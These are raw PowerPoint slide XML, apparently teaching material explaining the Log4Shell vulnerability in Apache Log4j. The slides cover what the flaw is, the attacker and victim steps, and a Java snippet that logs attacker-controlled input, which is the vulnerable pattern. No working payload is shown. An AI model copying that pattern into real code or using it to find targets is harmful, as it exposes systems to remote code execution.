                <p:cNvPr id="62" name="Ink 61">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEBA2F84-ABFE-811E-2EF2-5E7B214C21B9}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId101"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8865652" y="1972332"/>
                  <a:ext cx="72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6CCA0B8F-6266-B0C2-2045-5FFDF23A2CBF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9307012" y="2266452"/>
                <a:ext cx="118800" cy="586440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="63" name="Ink 62">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CCA0B8F-6266-B0C2-2045-5FFDF23A2CBF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId103"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9271372" y="2230452"/>
                  <a:ext cx="190440" cy="658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53B83FB8-AA41-81E4-AF77-C9C35AB45B8F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9309172" y="2156652"/>
                <a:ext cx="141120" cy="423000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="64" name="Ink 63">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53B83FB8-AA41-81E4-AF77-C9C35AB45B8F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId105"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9273172" y="2120652"/>
                  <a:ext cx="212760" cy="49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99CC2BF9-CC01-BF12-8C15-83080C5B6D88}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7431772" y="3743172"/>
              <a:ext cx="99720" cy="126720"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="65" name="Ink 64">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99CC2BF9-CC01-BF12-8C15-83080C5B6D88}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId107"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7396132" y="3707532"/>
                <a:ext cx="171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05BFBAC7-5B0B-865F-A743-095686A4C7A1}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7369492" y="3345012"/>
              <a:ext cx="29880" cy="29880"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="66" name="Ink 65">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05BFBAC7-5B0B-865F-A743-095686A4C7A1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId109"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7333852" y="3309012"/>
                <a:ext cx="101520" cy="101520"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="Group 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D9DD24-AFA5-795C-3BBE-36F2E8AC8074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7909132" y="3429612"/>
            <a:ext cx="367560" cy="870480"/>
            <a:chOff x="7909132" y="3429612"/>
            <a:chExt cx="367560" cy="870480"/>
          </a:xfrm>
        </p:grpSpPr>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75124994-4A84-52C9-68DC-21B0AC78ED1D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7909132" y="3579372"/>
                <a:ext cx="121320" cy="720720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="67" name="Ink 66">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75124994-4A84-52C9-68DC-21B0AC78ED1D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId111"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7873132" y="3543372"/>
                  <a:ext cx="192960" cy="792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DDCEBA69-0491-5AFC-B304-F3CD1A33F312}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7932172" y="3429612"/>
                <a:ext cx="344520" cy="487800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="68" name="Ink 67">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDCEBA69-0491-5AFC-B304-F3CD1A33F312}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId113"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7896532" y="3393612"/>
                  <a:ext cx="416160" cy="559440"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149131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Log4Shell vulnerability?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The Log4Shell vulnerability is a critical security flaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Remote Code Execution (RCE) vulnerability in the Apache Log4j library.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>allows remote attackers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>execute arbitrary code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>on a target system where the vulnerable version of Log4j is used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It was discovered in December 2021.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>known as CVE-2021-44228.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attackers could exploit Log4Shell vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Take control of affected systems, steal data, or carry out other malicious activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The Log4Shell attack can have severe consequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>affects a widely used Log4j library in Java-based applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220157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2844C9-97ED-8287-C1FE-0533ACEB4D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359508" y="2215340"/>
            <a:ext cx="11472984" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> identifies a target system that utilizes the Apache Log4j library.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> crafts a malicious payload and sends the payload to a victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>logs the incoming malicious payload as it would with any other log message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>executes the attacker's arbitrary code embedded in the malicious payload. The victim is compromised.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> may attempt to escalate privileges to access sensitive data or carry out additional malicious actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> may use the compromised system to exfiltrate data, launch additional attacks on other systems, or engage in other nefarious activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> may conceal their activities on the compromised system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFEE711C-E350-C917-4D7D-4C1AD3CDD8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78997"/>
            <a:ext cx="12192000" cy="1515912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45066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9CBF319-B296-6B10-9253-B45C264977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4987" y="271462"/>
            <a:ext cx="8582025" cy="6315075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4189D694-2BB2-30A9-F911-C341AB2D283B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381344" y="5982512"/>
            <a:ext cx="3843681" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>States of Attacker and Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342941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F52E-77CB-2241-0A92-D72BD124B8BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does the Log4Shell  attack work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA71D8AD-948C-6AB9-81E4-3F921CD923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415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F2C6-D80C-365F-B54A-1A529918F9B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenges to launch Log4Shell attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AE1FA33-B3D2-B69A-DB10-F54E057FA68E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers need to identify vulnerable code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers need to exploit the vulnerable code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41337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FBF-7FF3-DE6F-997C-CB83B7387D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attackers need to identify vulnerable Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E329FA93-93AB-4D93-F06B-500F86381120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10320215" cy="1325563"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>function in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4J</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A log string (info, error) contains a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stores an input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>controlled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> by attackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9FB1A1-005D-5713-EA00-4209B5DE9C14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726829" y="3286125"/>
            <a:ext cx="10431586" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import org.apache.logging.log4j.Logger;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import org.apache.logging.log4j.LogManager;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Logger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LogManager.getLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger.error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Logging Error - {}!", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
